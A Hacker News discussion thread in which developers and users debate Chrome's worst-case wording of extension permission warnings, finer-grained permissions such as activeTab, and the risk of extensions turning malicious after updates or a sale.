Hacker News new | past | comments | ask | show | jobs | submit login

I spent some time some productivity extensions, for gmail replies[0] and quick notetaking[1]. It was a lot of fun, but like other people have mentioned, porting to and working with manifest v3 is not as nice. I've noticed also that the way Google asks for permissions from the user is done in human-understandable, but worst-case language. For example, I think there was something where I wanted access to the current tab, so I could inject an overlay. I think a friend told me during installation that I was asking to see their history and browsing data. Which is true - knowing what page they're on does let you recreate their browsing history... but when presented to the user like that, it makes it seem like tracking history is the primary thing the extension does? Anyway, frustrating.

[0] https://chrome.google.com/webstore/detail/akndolpagcjaolannk... [1] https://chrome.google.com/webstore/detail/icdbglcdnjonofjpcf...




They're describing the worst-case thing someone could do with the privilege being granted, because they have no way of saying what the developer will do with the privilege.

The way to make the prompt sound less scary, is to use finer-grained permissions where the worst-case thing someone could do is less scary.

(Or, if there aren't any fine-grained permissions suited to doing your task — then propose some! The browser vendors would love to get real feedback on the kinds of fine-grained hypothetical privileges that extensions authors would actually find useful. Otherwise they're stuck reading the source code of a small sample of extensions, and extrapolating general patterns of privilege-use from there.)


> They're describing the worst-case thing someone could do with the privilege

I understand that - I wrote just that in my comment above. But it's a lot scarier to see a pop-up saying "This extension in the worst case does this", versus the worst-case scenario and a longer explanation. I see from your profile that you're at a web3 analytics company. I'll just say that I think metamask would be a lot less popular if at install-time, the chrome store alerted that it can "make you lose all your crypto savings". Yes this is possible, but there's more to the situation than just a few words, and you can't express that all in an alert() window.

> if there aren't any fine-grained permissions suited to doing your task — then propose some I think that is easy to say, but being subscribed to and reading updates to the extension feedback threads that I've been on for the last few years, I'm not super confident in Google acting on community feedback.


The thing is, from the POV of both Google and the user, there is no reason to assume a typical extension doesn't do the worst-case. The browser is just too juicy a target, and it's way too easy to make money on user surveillance / data exfiltration.

People rightfully point out that if you have access to current URL, you technically have access to browsing history. The right approach is to assume you will use it, hence the warning. Unfortunately, the only way to prevent this is to ensure the extension never, ever gets to make a networking request on its own, or populates any field that could become part of a network request triggered made by the site, or another extension.

It's a trust issue. It's not just fear that you might theoretically sell your extension to some unscrupulous third party. I don't know you personally. I have no reason to assume you are not an unscrupulous party. At this point there is, like, four or five extensions I trust enough to use, and it's mostly because they're OSS and it would be frontpage news on HN if any of them deviated from the expected functionality even slightly.

Having much finer-grained permission system would help a little, at the cost of making it incomprehensible to most users; there's a limit past which it's too complicated to be useful. We need actual innovation in the trust space - by which I don't mean crypto zero-trust shenanigans, but rather a system in which I can trust that, should the browser extension or phone app turn malicious, the vendor will be legally liable, and that it's actually enforced - thus disincentivizing malicious apps/extensions.


tbh I get your point but a lot of scams work because people don't realize. It's better to present the worst case and get people who don't read the fine print to uninstall your harmless extension, than not and have those same people install malicious extensions because "there's no way it can see my browser history, all it does is add an overlay to the current tab!"

Web3 services like MetaMask are primary examples which should have these big warnings, because crypto is rife with scams where someone does something (e.g. open an AirDrop, save their seed phrase in Google Drive) which gives an attacker access to their account without realizing. I don't doubt MetaMask is legit, but you want people to be diligent and understand that whenever they hook up one of these apps to their wallet they are giving a lot of potential for it to be compromised, so maybe be careful and honestly maybe use less of them.


The longer explanation might be correct in the short term, but long term I’m going to assume that you will eventually either take advantage of all that you can do to maximize your revenue or sell the extension to somebody who buys it because users have given that permission and they can exploit that trust.

I think what Google is doing is correct.


Alternatively, phrase the permission as what the app is technically trying to do, with a warning about what this could be used for.

"This extension wants be able to inject content in any tab. (Warning: This could potentially be used to track history of sites, and access all browsing data)."

That is actually accurate, while the current message is misleading.

Imagine this sort of scheme extended to "root" permission in ChromeOS. The stating worse case vs accurate with warning about worse case would be as follows:

> [Appname] wants permission to steel all your data and brick your device.

and

> [Appname] wants full control of this device. (Warning: this level of access could be used to steal your data, or brick your device).

The first one is most likely untrue, and borders on libel, while the second is true and accurate.


> (Or, if there aren't any fine-grained permissions suited to doing your task — then propose some! The browser vendors would love to get real feedback on the kinds of fine-grained hypothetical privileges that extensions authors would actually find useful. Otherwise they're stuck reading the source code of a small sample of extensions, and extrapolating general patterns of privilege-use from there.)

I'm curious, where are people supposed to do this? Is there actually a space / mechanism for this? Or is this a thing they would "like" to exist that there's not really an avenue for?


I think the avenue is "writing a blog post, posting it on HN, and having enough people agree with you that it'll stick around on the front page for long enough to expect some Chrome/Safari/Mozilla developer to see it."


A lot of Chrome development is public; check out https://www.chromium.org


> (Or, if there aren't any fine-grained permissions suited to doing your task — then propose some! The browser vendors would love to get real feedback on the kinds of fine-grained hypothetical privileges that extensions authors would actually find useful. Otherwise they're stuck reading the source code of a small sample of extensions, and extrapolating general patterns of privilege-use from there.)

We did, related to adblocking, they ignored it


Would be interesting if they did the same thing for their own operation. „We collect all data that we can about you, so that we can become a mega corp that can control most of your life.“ Wonder why they don’t do it?


This is keeping me from installing extensions.


Have you tried using "activeTab" permission? It doesn't show the user any warnings and "gives an extension temporary access to the currently active tab when the user invokes the extension".

https://developer.chrome.com/docs/extensions/mv3/manifest/ac...


Maybe the current version of your extension doesn't use that permission to track history and browsing data. But what about after an update or two or after it's been sold to the highest bidder, unbeknownst to the user? Worst case scenario is totally what I'd want to see as a power user.


Somewhat tangentially, I've been pushing for a popup/overlay API that allows to specify the position and size, and doesn't require any origin permissions.

https://github.com/w3c/webextensions/issues/307


I know this hurts as a developer, but using this language is just a way of being sincere to the user.


As a user it's not that helpful when extensions which inject stuff into the page (lots of them) all say they can access your history and browsing data. Even though it's actually true, it feels like a gap in the permissions model.


The problem is the gap is a mile wide. If you can see the current page url, you can see the next page URL and thus one page at a time you have the users browsing “history” from the moment they installed the extension, if you can run arbitrary JavaScript then you can check the back URL, you could potentially add some scope related restrictions to what injected JavaScript can do based on the permissions of the injecting extension but that still doesn’t stop the sort of “one page at a time discovery” of your private information and/or browser history.


The only actual solution to this problem is some kind of human review.

I wouldn't be against an "App Store" model provided users could go around it if they chose. I think Mozilla does something like this with certain "featured" extensions?


You would need to have code review on every update and to ensure that no code downloads anything it evaluates, and potentially even check for interactions with other plugins which could be compromised to provide eval mechanisms in an effort to “wash hands” of any malicious changes in later updates. (Since the long tail of updates seems to be one of the significant risk factors with less scrupulous actors trying to buy popular extensions for things like ad revenues before later dumping them to people who use them for malware or lousy eventually turning to malware themselves.

A review process can help but sadly it’s got a lot of work to do if it want to actually “solve” the problems here.


Opera browser used to have human reviewers for extensions. They were even commenting on code quality and rejecting until their fixes were not implemented.

I don't know if they still do it now or even if the browser is still developed.


  > it feels like a gap in the permissions model.
It _is_ a gap in the permissions model.


Then they need to be that explicit in other places too for consistency. Technically 3rd Party cookies also allow the same (tracking your browsing history, and other "worst case" results), but do they present it that way to the user when the user starts up Chrome and/or loads up google.com?

Try analyze these things while wearing a tinfoil hat. Google wants to gimp extensions so that we're one-step further away from tampering with the precious data pipe that Google wants from their servers to the user's monitor/eyeballs. If it gets in the way of that, they will neglect it (whether purposefully or conveniently unintentionally like these seemingly benign wording).


Maybe I'm underestimating the difficulty of this, but would it not make more sense for platforms to just give the user a complete listing of all the unique API function/method calls used by the app/extension with user-friendly descriptions of each?

The APIs would still be grouped by permission, but the user would be able to expand into a list of checkmarks showing to what extent those permissions are used. As well, an alert would be shown if any API usage changes between updates.


Several problems.

1) Bypassing any sort of static analysis of your extension requires, at worst, crafting an arbitrary code execution attack against yourself. This is not particuarly difficult.

2) Often times, the specific method you want to use is more powerful than what you need to do, so even if you were restricted to those specific methods, you still have more power than you actually use.

3) Supposing you want to go down the "whitelist at the method level" approach, you could just ... whitelist at the method level. The developer knows what methods he will be calling, so just have a seperate permission for each of them. In practice, this would lead to a lot of permissions that are effectivly equievelent, and people would be asking why they aren't just bundled together in a single permission.


4) Paraphrasing Hofstadter's law, 2) remains true even if you account for it, because of how APIs interact.

The example raised elsewhere in the thread is good: in a browser, if you have access to the current URL of any tab in context of which you run, you can start building browsing history. Whatever mitigations one could think of get defeated if the extension is allowed to make network requests, or modify content of web pages. Once an extension can communicate with outside world, it can exfil the data, even if piece by piece - and it can also keep its state outside of the browser.

Same applies to mobile apps.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: